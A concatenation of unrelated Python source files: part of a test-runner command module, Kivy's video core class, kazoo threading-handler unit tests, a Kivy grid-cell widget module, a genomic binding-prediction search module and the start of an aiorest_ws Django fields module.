This pushes all required files to the device and then runs the command.
"""
if self.verbose:
print '# %s' % self
android_driver().push_executable(self.shell_dir, 'bin', self.shell_name)
for abs_file in self.files_to_push:
abs_dir = os.path.dirname(abs_file)
file_name = os.path.basename(abs_file)
rel_dir = os.path.relpath(abs_dir, BASE_DIR)
android_driver().push_file(abs_dir, file_name, rel_dir)
start_time = time.time()
return_code = 0
timed_out = False
try:
stdout = android_driver().run(
'bin', self.shell_name, self.args, '.', self.timeout, self.env)
except CommandFailedException as e:
return_code = e.status
stdout = e.output
except TimeoutException as e:
return_code = 1
timed_out = True
# Sadly the Android driver doesn't provide output on timeout.
stdout = ''
duration = time.time() - start_time
return output.Output(
return_code,
timed_out,
stdout,
'', # No stderr available.
-1, # No pid available.
duration,
)
Command = None
def setup(target_os):
"""Set the Command class to the OS-specific version."""
global Command
if target_os == 'android':
Command = AndroidCommand
elif target_os == 'windows':
Command = WindowsCommand
else:
Command = PosixCommand
def tear_down():
"""Clean up after using commands."""
if Command == AndroidCommand:
android_driver().tear_down()
|
|
'''
Video
=====
Core class for reading video files and managing the video
:class:`~kivy.graphics.texture.Texture`.
.. versionchanged:: 1.10.0
The pyglet, pygst and gi providers have been removed.
.. versionchanged:: 1.8.0
There are now 2 distinct Gstreamer implementations: one using Gi/Gst
working for both Python 2+3 with Gstreamer 1.0, and one using PyGST
working only for Python 2 + Gstreamer 0.10.
.. note::
Recording is not supported.
'''
__all__ = ('VideoBase', 'Video')
from kivy.clock import Clock
from kivy.core import core_select_lib
from kivy.event import EventDispatcher
from kivy.logger import Logger
from kivy.compat import PY2
class VideoBase(EventDispatcher):
'''VideoBase, a class used to implement a video reader.
:Parameters:
`filename`: str
Filename of the video. Can be a file or an URI.
`eos`: str, defaults to 'pause'
Action to take when EOS is hit. Can be one of 'pause', 'stop' or
'loop'.
.. versionchanged:: 1.4.0
added 'pause'
`async`: bool, defaults to True
Load the video asynchronously (may be not supported by all
providers).
`autoplay`: bool, defaults to False
Auto play the video on init.
:Events:
`on_eos`
Fired when EOS is hit.
`on_load`
Fired when the video is loaded and the texture is available.
`on_frame`
Fired when a new frame is written to the texture.
'''
__slots__ = ('_wantplay', '_buffer', '_filename', '_texture',
'_volume', 'eos', '_state', '_async', '_autoplay')
__events__ = ('on_eos', 'on_load', 'on_frame')
def __init__(self, **kwargs):
kwargs.setdefault('filename', None)
kwargs.setdefault('eos', 'stop')
kwargs.setdefault('async', True)
kwargs.setdefault('autoplay', False)
super(VideoBase, self).__init__()
self._wantplay = False
self._buffer = None
self._filename = None
self._texture = None
self._volume = 1.
self._state = ''
self._autoplay = kwargs.get('autoplay')
self._async = kwargs.get('async')
self.eos = kwargs.get('eos')
if self.eos == 'pause':
Logger.warning("'pause' is deprecated. Use 'stop' instead.")
self.eos = 'stop'
self.filename = kwargs.get('filename')
Clock.schedule_interval(self._update, 1 / 30.)
if self._autoplay:
self.play()
def __del__(self):
self.unload()
def on_eos(self):
pass
def on_load(self):
pass
def on_frame(self):
pass
def _get_filename(self):
return self._filename
def _set_filename(self, filename):
if filename == self._filename:
return
self.unload()
self._filename = filename
if self._filename is None:
return
self.load()
filename = property(lambda self: self._get_filename(),
lambda self, x: self._set_filename(x),
doc='Get/set the filename/uri of the current video')
def _get_position(self):
return 0
def _set_position(self, pos):
self.seek(pos)
position = property(lambda self: self._get_position(),
lambda self, x: self._set_position(x),
doc='Get/set the position in the video (in seconds)')
def _get_volume(self):
return self._volume
def _set_volume(self, volume):
self._volume = volume
volume = property(lambda self: self._get_volume(),
lambda self, x: self._set_volume(x),
doc='Get/set the volume in the video (1.0 = 100%)')
def _get_duration(self):
return 0
duration = property(lambda self: self._get_duration(),
doc='Get the video duration (in seconds)')
def _get_texture(self):
return self._texture
texture = property(lambda self: self._get_texture(),
doc='Get the video texture')
def _get_state(self):
return self._state
state = property(lambda self: self._get_state(),
doc='Get the video playing status')
def _do_eos(self, *args):
'''
.. versionchanged:: 1.4.0
Now dispatches the `on_eos` event.
'''
if self.eos == 'pause':
self.pause()
elif self.eos == 'stop':
self.stop()
elif self.eos == 'loop':
self.position = 0
self.play()
self.dispatch('on_eos')
def _update(self, dt):
'''Update the video content to texture.
'''
pass
def seek(self, percent, precise=True):
'''Move to position as percentage (strictly, a proportion from
0 - 1) of the duration'''
pass
def stop(self):
'''Stop the video playing'''
self._state = ''
def pause(self):
'''Pause the video
.. versionadded:: 1.4.0
'''
self._state = 'paused'
def play(self):
'''Play the video'''
self._state = 'playing'
def load(self):
'''Load the video from the current filename'''
pass
def unload(self):
'''Unload the actual video'''
self._state = ''
# Load the appropriate provider
video_providers = []
try:
from kivy.lib.gstplayer import GstPlayer # NOQA
video_providers += [('gstplayer', 'video_gstplayer', 'VideoGstplayer')]
except ImportError:
pass
video_providers += [
('ffmpeg', 'video_ffmpeg', 'VideoFFMpeg'),
('ffpyplayer', 'video_ffpyplayer', 'VideoFFPy'),
('null', 'video_null', 'VideoNull')]
Video = core_select_lib('video', video_providers)
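# Example usage (sketch; assumes a provider such as ffpyplayer is installed
# and that 'movie.mp4' exists):
#
#     video = Video(filename='movie.mp4', eos='loop')
#     video.volume = 0.5
#     video.play()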
|
|
import threading
import unittest
import mock
from nose.tools import assert_raises
from nose.tools import eq_
from nose.tools import raises
class TestThreadingHandler(unittest.TestCase):
def _makeOne(self, *args):
from kazoo.handlers.threading import SequentialThreadingHandler
return SequentialThreadingHandler(*args)
def _getAsync(self, *args):
from kazoo.handlers.threading import AsyncResult
return AsyncResult
def test_proper_threading(self):
h = self._makeOne()
h.start()
        # threading._Event was removed in Python 3.3; before that, Event is a
        # factory function and _Event is the underlying class.
event_class = getattr(threading, '_Event', threading.Event)
assert isinstance(h.event_object(), event_class)
def test_matching_async(self):
h = self._makeOne()
h.start()
async = self._getAsync()
assert isinstance(h.async_result(), async)
def test_exception_raising(self):
h = self._makeOne()
@raises(h.timeout_exception)
def testit():
raise h.timeout_exception("This is a timeout")
testit()
def test_double_start_stop(self):
h = self._makeOne()
h.start()
self.assertTrue(h._running)
h.start()
h.stop()
h.stop()
self.assertFalse(h._running)
class TestThreadingAsync(unittest.TestCase):
def _makeOne(self, *args):
from kazoo.handlers.threading import AsyncResult
return AsyncResult(*args)
def _makeHandler(self):
from kazoo.handlers.threading import SequentialThreadingHandler
return SequentialThreadingHandler()
def test_ready(self):
mock_handler = mock.Mock()
async = self._makeOne(mock_handler)
eq_(async.ready(), False)
async.set('val')
eq_(async.ready(), True)
eq_(async.successful(), True)
eq_(async.exception, None)
def test_callback_queued(self):
mock_handler = mock.Mock()
mock_handler.completion_queue = mock.Mock()
async = self._makeOne(mock_handler)
async.rawlink(lambda a: a)
async.set('val')
assert mock_handler.completion_queue.put.called
def test_set_exception(self):
mock_handler = mock.Mock()
mock_handler.completion_queue = mock.Mock()
async = self._makeOne(mock_handler)
async.rawlink(lambda a: a)
        async.set_exception(ImportError('Error occurred'))
assert isinstance(async.exception, ImportError)
assert mock_handler.completion_queue.put.called
def test_get_wait_while_setting(self):
mock_handler = mock.Mock()
async = self._makeOne(mock_handler)
lst = []
bv = threading.Event()
cv = threading.Event()
def wait_for_val():
bv.set()
val = async.get()
lst.append(val)
cv.set()
th = threading.Thread(target=wait_for_val)
th.start()
bv.wait()
async.set('fred')
cv.wait()
eq_(lst, ['fred'])
th.join()
def test_get_with_nowait(self):
mock_handler = mock.Mock()
async = self._makeOne(mock_handler)
timeout = self._makeHandler().timeout_exception
@raises(timeout)
def test_it():
async.get(block=False)
test_it()
@raises(timeout)
def test_nowait():
async.get_nowait()
test_nowait()
def test_get_with_exception(self):
mock_handler = mock.Mock()
async = self._makeOne(mock_handler)
lst = []
bv = threading.Event()
cv = threading.Event()
def wait_for_val():
bv.set()
try:
val = async.get()
except ImportError:
lst.append('oops')
else:
lst.append(val)
cv.set()
th = threading.Thread(target=wait_for_val)
th.start()
bv.wait()
async.set_exception(ImportError)
cv.wait()
eq_(lst, ['oops'])
th.join()
def test_wait(self):
mock_handler = mock.Mock()
async = self._makeOne(mock_handler)
lst = []
bv = threading.Event()
cv = threading.Event()
def wait_for_val():
bv.set()
try:
val = async.wait(10)
except ImportError:
lst.append('oops')
else:
lst.append(val)
cv.set()
th = threading.Thread(target=wait_for_val)
th.start()
bv.wait(10)
async.set("fred")
cv.wait(15)
eq_(lst, [True])
th.join()
def test_set_before_wait(self):
mock_handler = mock.Mock()
async = self._makeOne(mock_handler)
lst = []
cv = threading.Event()
async.set('fred')
def wait_for_val():
val = async.get()
lst.append(val)
cv.set()
th = threading.Thread(target=wait_for_val)
th.start()
cv.wait()
eq_(lst, ['fred'])
th.join()
def test_set_exc_before_wait(self):
mock_handler = mock.Mock()
async = self._makeOne(mock_handler)
lst = []
cv = threading.Event()
async.set_exception(ImportError)
def wait_for_val():
try:
val = async.get()
except ImportError:
lst.append('ooops')
else:
lst.append(val)
cv.set()
th = threading.Thread(target=wait_for_val)
th.start()
cv.wait()
eq_(lst, ['ooops'])
th.join()
def test_linkage(self):
mock_handler = mock.Mock()
async = self._makeOne(mock_handler)
cv = threading.Event()
lst = []
def add_on():
lst.append(True)
def wait_for_val():
async.get()
cv.set()
th = threading.Thread(target=wait_for_val)
th.start()
async.rawlink(add_on)
async.set('fred')
assert mock_handler.completion_queue.put.called
async.unlink(add_on)
cv.wait()
eq_(async.value, 'fred')
th.join()
def test_linkage_not_ready(self):
mock_handler = mock.Mock()
async = self._makeOne(mock_handler)
lst = []
def add_on():
lst.append(True)
async.set('fred')
        assert not mock_handler.completion_queue.put.called
async.rawlink(add_on)
assert mock_handler.completion_queue.put.called
def test_link_and_unlink(self):
mock_handler = mock.Mock()
async = self._makeOne(mock_handler)
lst = []
def add_on():
lst.append(True)
async.rawlink(add_on)
assert not mock_handler.completion_queue.put.called
async.unlink(add_on)
async.set('fred')
assert not mock_handler.completion_queue.put.called
def test_captured_exception(self):
from kazoo.handlers.utils import capture_exceptions
mock_handler = mock.Mock()
async = self._makeOne(mock_handler)
@capture_exceptions(async)
def exceptional_function():
return 1/0
exceptional_function()
assert_raises(ZeroDivisionError, async.get)
def test_no_capture_exceptions(self):
from kazoo.handlers.utils import capture_exceptions
mock_handler = mock.Mock()
async = self._makeOne(mock_handler)
lst = []
def add_on():
lst.append(True)
async.rawlink(add_on)
@capture_exceptions(async)
def regular_function():
return True
regular_function()
assert not mock_handler.completion_queue.put.called
def test_wraps(self):
from kazoo.handlers.utils import wrap
mock_handler = mock.Mock()
async = self._makeOne(mock_handler)
lst = []
def add_on(result):
lst.append(result.get())
async.rawlink(add_on)
@wrap(async)
def regular_function():
return 'hello'
assert regular_function() == 'hello'
assert mock_handler.completion_queue.put.called
assert async.get() == 'hello'
|
|
"""All widgets in the kivy-grid-cells package"""
from contextlib import contextmanager
import logging
from kivy.properties import (
NumericProperty,
ListProperty,
BooleanProperty,
)
from kivy.uix.relativelayout import RelativeLayout
from kivy.uix.widget import Widget
import numpy as np
from .constants import Colours, States
log = logging.getLogger(__name__)
__all__ = ["GridCell", "DrawableGrid"]
class GridCell(Widget):
"""A cell within the grid. This can be activated by clicking it."""
state = NumericProperty(States.DEACTIVATED)
border_state = NumericProperty(States.DEACTIVATED)
colour = ListProperty(Colours[States.DEACTIVATED])
border_colour = ListProperty((0, 0, 0, 0))
def __init__(self, cell_size, coordinates):
self.coordinates = coordinates
column_number, row_number = coordinates
kwargs = {
"size_hint": [None, None],
"size": [cell_size, cell_size],
}
super(GridCell, self).__init__(**kwargs)
self.update_canvas()
def update_canvas(self):
""" Update the canvas with the current state of the cell
>>> cell = GridCell(1, (0, 0))
>>> cell.state = States.FIRST
>>> cell.update_canvas()
>>> cell.colour == list(Colours[States.FIRST])
True
>>> cell.border_colour
[0, 0, 0, 0]
>>> cell.border_state = States.SECOND
>>> cell.update_canvas()
>>> cell.border_colour == list(Colours[States.SECOND])
True
"""
self.colour = Colours[self.state]
if self.border_state == States.DEACTIVATED:
self.border_colour = (0, 0, 0, 0) # Transparent
else:
self.border_colour = Colours[self.border_state]
def update_parent_cell(self):
self.parent.update_cells(self.coordinates, self.state)
def set_state(self, state):
""" Set the fill state of the cell
>>> import mock
>>> cell = GridCell(1, (0, 0))
>>> cell.parent = mock.Mock()
>>> cell.set_state(States.FIRST)
>>> cell.state == States.FIRST
True
>>> cell.colour == list(Colours[States.FIRST])
True
"""
if hasattr(state, "dtype"):
assert state.dtype == int, state.dtype
state = int(state)
self.state = state
self.update_canvas()
self.update_parent_cell()
log.debug("Set state of {} to {}".format(self, state))
def set_border_state(self, state):
""" Set the border state of the cell
>>> cell = GridCell(1, (0, 0))
>>> cell.set_border_state(States.FIRST)
>>> cell.state == States.DEACTIVATED
True
>>> cell.colour == list(Colours[States.DEACTIVATED])
True
>>> cell.border_colour == list(Colours[States.FIRST])
True
"""
if hasattr(state, "dtype"):
assert state.dtype == int, state.dtype
state = int(state)
self.border_state = state
self.update_canvas()
def handle_touch(self):
""" Flip the cell's state between on and off
>>> import mock
>>> cell = GridCell(1, (0, 0))
>>> cell.parent = mock.Mock(selected_state=States.FIRST)
>>> new_state = cell.handle_touch()
>>> new_state == cell.state == States.FIRST
True
>>> new_state = cell.handle_touch()
>>> new_state == cell.state == States.DEACTIVATED
True
"""
if self.state == self.parent.selected_state:
new_state = States.DEACTIVATED
else:
new_state = self.parent.selected_state
self.set_state(new_state)
return new_state
def on_touch_down(self, evt):
if not self.collide_point(*evt.pos):
# Not on this square
return
self.handle_touch()
def on_touch_move(self, evt):
if not self.collide_point(*evt.pos):
# Not on this square
return super(GridCell, self).on_touch_move(evt)
if self.collide_point(*evt.ppos):
# Not moved to this square
return super(GridCell, self).on_touch_move(evt)
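        # The first cell entered during a drag decides what the drag paints:
        # activate if that cell was empty, clear otherwise. Cells already in
        # the target state are skipped so a drag never flip-flops.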
if self.parent.drag_state is None:
self.parent.drag_state = (
self.parent.selected_state
if self.state == States.DEACTIVATED else States.DEACTIVATED
)
elif self.parent.drag_state == self.state:
return
self.handle_touch()
def on_touch_up(self, evt):
if self.parent.drag_state is not None:
self.parent.drag_state = None
def __repr__(self):
return "{}<{}>".format(self.__class__.__name__,
", ".join(str(c) for c in self.coordinates))
class DrawableGrid(RelativeLayout):
"""A grid of cells that can be in a number of states"""
rows = NumericProperty()
cols = NumericProperty()
cell_size = NumericProperty(25)
selected_state = NumericProperty(States.FIRST)
grids = ListProperty()
num_grids = NumericProperty(1)
CELLS_GRID = 0
GRID_CELL_CLASS = GridCell
def __init__(self, *args, **kwargs):
super(DrawableGrid, self).__init__(*args, **kwargs)
self._cells = None
def cell_coordinates(self, pos, is_absolute=True):
""" Determine which cell corresponds to absolute or relative position
:param pos: Position in pixels
:type pos: 2-tuple
:param is_absolute: Is pos an absolute or relative position?
        :type is_absolute: bool
>>> import mock
>>> grid = DrawableGrid(cell_size=5)
>>> grid.to_widget = mock.Mock()
>>> grid.to_widget.return_value = (111, 111)
>>> # Returns calculated value
>>> grid.cell_coordinates((26, 35), is_absolute=False)
(5, 7)
>>> grid.to_widget.called
False
>>> # Returns mocked value
>>> grid.cell_coordinates((26, 35))
(22, 22)
>>> grid.to_widget.called
True
"""
if is_absolute:
pos = self.to_widget(*pos)
return (pos[0] // self.cell_size,
pos[1] // self.cell_size)
def init_cells(self):
""" Sets up the grid arrays and the cell widgets
Simple example:
>>> grid = DrawableGrid()
>>> grid.init_cells()
>>> grid.grids
[array([], shape=(0, 0), dtype=int64)]
>>> [g.flags.writeable for g in grid.grids]
[False]
>>> grid.cell_widgets
[]
Example with some cells and multiple grids:
>>> grid = DrawableGrid(rows=2, cols=1, num_grids=3)
>>> grid.init_cells()
>>> grid.grids
[array([[0, 0]]), array([[0, 0]]), array([[0, 0]])]
>>> [g.flags.writeable for g in grid.grids]
[False, False, False]
>>> grid.cell_widgets
[[GridCell<0, 0>], [GridCell<0, 1>]]
Check that overwriting is forbidden
>>> grid.init_cells()
Traceback (most recent call last):
RuntimeError: Cells already initialised!
"""
if self._cells is not None:
raise RuntimeError("Cells already initialised!")
self._setup_cell_widgets()
self._cells = np.zeros(dtype=int, shape=(self.cols, self.rows))
self.grids = [self._cells]
for num in range(1, self.num_grids):
self.grids.append(self._cells.copy())
for grid in self.grids:
grid.setflags(write=False)
self.drag_state = None
def _setup_cell_widgets(self):
self.cell_widgets = []
for row_number in xrange(self.rows):
row = []
for column_number in xrange(self.cols):
cell = self.GRID_CELL_CLASS(
self.cell_size, (column_number, row_number))
cell.y = (row_number) * self.cell_size
cell.x = (column_number) * self.cell_size
row.append(cell)
self.cell_widgets.append(row)
with self.canvas:
for row in self.cell_widgets:
for cell in row:
self.add_widget(cell)
@contextmanager
def _writable_grid(self, index):
"""Set self.grids[index] to be writable, then unset it"""
grid = self.grids[index]
try:
grid.setflags(write=True)
yield
finally:
grid.setflags(write=False)
def on_cells_updated(self):
"""This is a hook to update things when the cells have been updated"""
pass
@property
def writable_cells(self):
"""
Usage:
>>> grid = DrawableGrid()
>>> grid.init_cells()
>>> grid.cells.flags.writeable
False
>>> with grid.writable_cells:
... grid.cells.flags.writeable
True
>>> grid.cells.flags.writeable
False
"""
return self._writable_grid(index=self.CELLS_GRID)
def update_cells(self, coordinates, state):
""" Set cell state at coordinates.
:param coordinates: Cell coordinates to update
:type coordinates: 2-tuple
:param state: New state for the cell
:type state: int
>>> grid = DrawableGrid(rows=2, cols=1)
>>> grid.init_cells()
>>> grid.cells
array([[0, 0]])
>>> grid.update_cells((0, 0), 1)
>>> grid.cells
array([[1, 0]])
"""
with self.writable_cells:
self._cells[coordinates] = state
self.on_cells_updated()
def set_cell_state(self, cell, y, x):
cell.set_state(self.cells[y, x])
def update_cell_widgets(self):
""" Set each cell widget's state according to the state of the np grid
>>> grid = DrawableGrid(rows=2, cols=1)
>>> grid.init_cells()
>>> grid.cells = np.array([[1, 2]])
>>> grid.update_cell_widgets()
>>> grid.cell_widgets[0][0].state
1
>>> grid.cell_widgets[1][0].state
2
"""
for x, row in enumerate(self.cell_widgets):
for y, cell in enumerate(row):
self.set_cell_state(cell, y, x)
def clear_grid(self, index):
""" Replace the chosen grid with a zero grid of the same shape
:param index: Index of the grid to update
        :type index: int
>>> grid = DrawableGrid(rows=2, cols=1)
>>> grid.init_cells()
>>> grid.cells = np.array([[1, 2]])
>>> grid.clear_grid(0)
>>> grid.cells
array([[0, 0]])
"""
new_grid = np.zeros_like(self.grids[index])
if index == self.CELLS_GRID:
# cells property does everything we need
self.cells = new_grid
else:
new_grid.setflags(write=False)
self.grids[index] = new_grid
def clear_grid_for_event(self, grid_index, evt):
""" This is designed to be subclassed, so that only part of the grid
can be cleared, if so desired. """
return self.clear_grid(grid_index)
@property
def cells(self):
return self._cells
@cells.setter
def cells(self, cells):
"""
Cell values can be set here. This will update the related widgets.
"""
if hasattr(cells, "copy"):
# Assume cells is a numpy array
cells = cells.copy()
else:
cells = np.array(cells)
cells.setflags(write=False)
assert cells.ndim == 2, cells.ndim
assert cells.shape == self._cells.shape, "{} != {}".format(
cells.shape, self._cells.shape)
assert cells.dtype == self._cells.dtype, "{} != {}".format(
cells.dtype, self._cells.dtype)
self._cells = cells
self.grids[self.CELLS_GRID] = cells
self.on_cells_updated()
self.update_cell_widgets()
|
|
import math
import uuid
import base64
import psycopg2.extras
from pred.webserver.customlist import CustomList, does_custom_list_exist, get_gene_name_set
from pred.queries.predictionquery import PredictionQuery
from pred.queries.maxpredictionquery import MaxPredictionQuery
from pred.queries.genelistquery import GeneListQuery
from pred.queries.rangelistquery import RangeListQuery
CUSTOM_GENE_LIST = 'Custom Gene List'
CUSTOM_RANGES_LIST = 'Custom Ranges List'
CUSTOM_GENE_NAME_TYPE = 'gene_name'
CUSTOM_ID_TYPE = 'id'
def get_predictions_with_guess(db, config, genome, args):
search_args = SearchArgs(config.binding_max_offset, args)
if search_args.is_last_page():
last_page = determine_last_page(db, genome, search_args)
search_args.set_page(last_page)
model = search_args.get_model_name()
max_sort_guess = config.get_max_sort_guess(genome, model)
search = PredictionSearch(db, genome, search_args, enable_guess=True, max_sort_guess=max_sort_guess)
predictions = search.get_predictions()
if search.has_max_prediction_guess(): # repeat without guess if we didn't get enough values
per_page = search.get_per_page()
if per_page:
if len(predictions) < per_page:
search.enable_guess = False
predictions = search.get_predictions()
return predictions, search.args, search.warning
def determine_last_page(db, genome, search_args):
search = PredictionSearch(db, genome, search_args, enable_guess=True)
items = float(search.get_count())
per_page = int(search_args.get_per_page())
return int(math.ceil(items / per_page))
def get_all_values(prediction, size):
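    # Flatten one prediction row into a per-base list of length size, keeping
    # the largest-magnitude value at each offset; reversed for '-' strand rows.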
if not size:
size = int(prediction['end']) - int(prediction['start'])
values = [0] * size
offset = 0
if 'start' in prediction:
offset = int(prediction['start'])
for data in prediction['values']:
start = int(data['start'])
value = data['value']
idx = start - offset
        if 0 <= idx < size:
if abs(value) > abs(values[idx]):
values[idx] = value
result = [str(val) for val in values]
if 'strand' in prediction:
if prediction['strand'] == '-':
return result[::-1]
return result
class PredictionQueryNames(object):
COMMON_NAME = 'common_name'
NAME = 'name'
MAX_VALUE = 'max_value'
CHROM = 'chrom'
STRAND = 'strand'
GENE_BEGIN = 'gene_begin'
PRED = 'pred'
RANGE_START = 'range_start'
RANGE_END = 'range_end'
class SearchArgs(object):
GENE_LIST = 'geneList'
MODEL = 'protein'
UPSTREAM = 'upstream'
DOWNSTREAM = 'downstream'
PAGE = 'page'
PER_PAGE = 'perPage'
MAX_PREDICTION_SORT = 'maxPredictionSort'
FORMAT = 'format'
BINDING_SITE_LIST = 'bindingSiteList'
INCLUDE_ALL = 'includeAll'
CUSTOM_LIST_DATA = 'customListData'
CUSTOM_LIST_FILTER = 'customListFilter'
    CUSTOM_GENE_SEARCH_TYPE = 'customGeneSearchType'
def __init__(self, max_stream_val, args):
self.max_stream_val = max_stream_val
self.args = args
self.page = args.get(self.PAGE)
def _get_required_arg(self, name):
value = self.args.get(name, None)
if not value:
raise ValueError("Missing {} field.".format(name))
return value
def _get_required_stream_arg(self, name):
value = self._get_required_arg(name)
int_value = int(value)
if int_value < 0:
raise ValueError("{} value must be positive.".format(name))
if int_value > self.max_stream_val:
raise ValueError("{} value must be less than {}.".format(name, self.max_stream_val))
return int_value
def get_gene_list(self):
return self._get_required_arg(self.GENE_LIST)
def get_model_name(self):
return self._get_required_arg(self.MODEL)
def get_upstream(self):
return self._get_required_stream_arg(self.UPSTREAM)
def get_downstream(self):
return self._get_required_stream_arg(self.DOWNSTREAM)
def get_sort_by_max(self):
return "true" == self.args.get(self.MAX_PREDICTION_SORT)
def get_page_and_per_page(self):
page = self.page
per_page = self.get_per_page()
if page and per_page:
return int(page), int(per_page)
if page or per_page: # must have both or none
raise ValueError("You must specify both {} and {}".format(self.PAGE, self.PER_PAGE))
return None, None
def get_per_page(self):
return self.args.get(self.PER_PAGE, None)
def is_last_page(self):
return self.page and int(self.page) == -1
def set_page(self, page_num):
self.page = page_num
def get_format(self):
return self.args.get(self.FORMAT, 'json')
def get_binding_site_list(self):
"""
Does the user want to see a binding site list instead of numeric columns
:return: boolean
"""
return self.args.get(self.BINDING_SITE_LIST, '') == 'true'
def get_include_all(self):
return self.args.get(self.INCLUDE_ALL, '') == 'true'
def get_custom_list_data(self):
if self.is_custom_gene_list() or self.is_custom_ranges_list():
list_id_str = self.args.get(self.CUSTOM_LIST_DATA)
try:
val = uuid.UUID(list_id_str, version=1)
except ValueError:
raise ValueError("Invalid custom list id:{}".format(list_id_str))
custom_list_filter = self.get_custom_list_filter()
return CustomList(self.is_custom_gene_list(), list_id_str, custom_list_filter)
return ''
def get_custom_list_filter(self):
return self.args.get(self.CUSTOM_LIST_FILTER, '')
def is_custom_gene_list(self):
return self.get_gene_list() == CUSTOM_GENE_LIST
def is_custom_ranges_list(self):
return self.get_gene_list() == CUSTOM_RANGES_LIST
def get_custom_gene_search_type(self):
return self.args.get(self.CUSTOM_GENE_SEARCH_TYPE, 'gene_name')
def is_custom_gene_name_search_type(self):
return self.get_custom_gene_search_type() == CUSTOM_GENE_NAME_TYPE
def is_custom_gene_id_search_type(self):
return self.get_custom_gene_search_type() == CUSTOM_ID_TYPE
class PredictionToken(object):
def __init__(self, search_args):
self.search_args = search_args
def get(self):
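        # Serialize the search args as "key=value," pairs (skipping undefined
        # ones) and base64-encode the result into an opaque ASCII token.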
result = ""
for key, value in self.search_args.args.items():
if value != 'undefined':
result += "{}={},".format(key, value)
return base64.b64encode(bytes(result, "utf-8")).decode('ascii')
class PredictionSearch(object):
def __init__(self, db, genome, search_args, enable_guess=True, max_sort_guess=None):
self.db = db
self.genome = genome
self.args = search_args
self.enable_guess = enable_guess
self.max_sort_guess = max_sort_guess
self.warning = ''
def get_count(self):
query, params = self.make_query_and_params(count=True)
cur = self.db.cursor(cursor_factory=psycopg2.extras.DictCursor)
cur.execute(query, params)
items = cur.fetchone()[0]
cur.close()
return items
def get_predictions(self):
upstream = self.args.get_upstream()
downstream = self.args.get_downstream()
query, params = self.make_query_and_params(count=False)
cur = self.db.cursor(cursor_factory=psycopg2.extras.DictCursor)
cur.execute(query, params)
predictions = []
for row in cur.fetchall():
gene_start_str = row[PredictionQueryNames.GENE_BEGIN]
gene_start = ""
if gene_start_str:
gene_start = int(gene_start_str)
strand = row[PredictionQueryNames.STRAND]
start = None
end = None
if gene_start:
if strand == '+':
start = gene_start - upstream
end = gene_start + downstream
else:
start = gene_start - downstream
end = gene_start + upstream
else:
start = row.get(PredictionQueryNames.RANGE_START, '')
end = row.get(PredictionQueryNames.RANGE_END, '')
row = {
'name': self.unique_name_parts(row.get(PredictionQueryNames.NAME, '')),
'commonName': row.get(PredictionQueryNames.COMMON_NAME, ''),
'chrom': row.get(PredictionQueryNames.CHROM, ''),
'max': str(row.get(PredictionQueryNames.MAX_VALUE, '')),
'start': str(start),
'end': str(end),
'values': self.unique_predictions(row[PredictionQueryNames.PRED]),
'strand': strand,
}
predictions.append(row)
self.db.rollback()
cur.close()
return predictions
@staticmethod
def unique_name_parts(combined_name):
# Since we left outer join we can end up with an empty prediction record.
# Skip these empty predictions so we can return an empty list.
if not combined_name:
return ''
parts = sorted(set(combined_name.split("; ")))
return "; ".join(parts)
@staticmethod
def unique_predictions(preds):
results = []
starts = set()
for pred in preds:
start = pred['start']
            if start and start not in starts:
starts.add(start)
results.append(pred)
return results
@staticmethod
def same_except_name(row, prev_row):
if not prev_row:
return False
check_fields = ['commonName', 'chrom', 'max', 'start', 'end', 'strand']
for field in check_fields:
if prev_row[field] != row[field]:
return False
return True
def make_query_and_params(self, count):
return self.determine_query(count).get_query_and_params()
def determine_query(self, count):
if self.args.is_custom_gene_list():
return self.gene_list_query(count)
if self.args.is_custom_ranges_list():
return self.range_list_query(count)
if self.args.get_sort_by_max():
return self.max_query(count)
return self.normal_query(count)
def get_custom_list_fields(self):
custom_data_list = self.args.get_custom_list_data()
key = custom_data_list.key
if not does_custom_list_exist(self.db, key):
raise ValueError("No data found for this custom list. Perhaps it has purged.")
return key, custom_data_list.custom_list_filter
def gene_list_query(self, count):
custom_list_key, custom_list_filter = self.get_custom_list_fields()
limit, offset = self.get_limit_and_offset(count)
return GeneListQuery(
schema=self.genome,
custom_list_id=custom_list_key,
custom_list_filter=custom_list_filter,
custom_gene_name_type=self.args.is_custom_gene_name_search_type(),
model_name=self.args.get_model_name(),
upstream=self.args.get_upstream(),
downstream=self.args.get_downstream(),
limit=limit,
offset=offset,
count=count,
sort_by_max=self.args.get_sort_by_max(),
)
def range_list_query(self, count):
custom_list_key, custom_list_filter = self.get_custom_list_fields()
limit, offset = self.get_limit_and_offset(count)
return RangeListQuery(
schema=self.genome,
custom_list_id=custom_list_key,
model_name=self.args.get_model_name(),
limit=limit,
offset=offset,
count=count,
sort_by_max=self.args.get_sort_by_max(),
)
def max_query(self, count):
guess = None
if self.enable_guess and self.max_sort_guess:
guess = self.max_sort_guess
limit, offset = self.get_limit_and_offset(count)
return MaxPredictionQuery(
schema=self.genome,
gene_list=self.args.get_gene_list(),
model_name=self.args.get_model_name(),
upstream=self.args.get_upstream(),
downstream=self.args.get_downstream(),
guess=guess,
limit=limit,
offset=offset,
count=count,
)
def normal_query(self, count):
limit, offset = self.get_limit_and_offset(count)
return PredictionQuery(
schema=self.genome,
gene_list=self.args.get_gene_list(),
model_name=self.args.get_model_name(),
upstream=self.args.get_upstream(),
downstream=self.args.get_downstream(),
limit=limit,
offset=offset,
count=count,
)
def get_limit_and_offset(self, count):
if not count:
page, per_page = self.args.get_page_and_per_page()
if page and per_page:
return per_page, (page - 1) * per_page
return None, None
def has_max_prediction_guess(self):
return self.args.get_sort_by_max() and self.max_sort_guess
def get_per_page(self):
page, per_page = self.args.get_page_and_per_page()
return per_page
def get_name_set(self, query_and_param):
result = set()
query, params = query_and_param
cur = self.db.cursor(cursor_factory=psycopg2.extras.DictCursor)
cur.execute(query, params)
for row in cur.fetchall():
result.add(row[0])
self.db.rollback()
        cur.close()
return result
|
|
# -*- coding: utf-8 -*-
"""
Field entities implemented to support the Django ORM.
Every class represented here is associated with one particular field type of
a table in the Django ORM. Each of these fields is also used later for
serializing/deserializing ORM objects.
"""
import datetime
import re
import uuid
from aiorest_ws.conf import settings
from aiorest_ws.db.orm import fields
from aiorest_ws.db.orm.django.compat import get_remote_field, \
value_from_object
from aiorest_ws.db.orm.fields import empty
from aiorest_ws.db.orm.validators import MaxLengthValidator
from aiorest_ws.utils.date.dateparse import parse_duration
from django.forms import FilePathField as DjangoFilePathField
from django.forms import ImageField as DjangoImageField
from django.core.exceptions import ValidationError as DjangoValidationError
from django.core.validators import EmailValidator, RegexValidator, \
URLValidator, ip_address_validators
from django.utils import six
from django.utils.duration import duration_string
from django.utils.encoding import is_protected_type
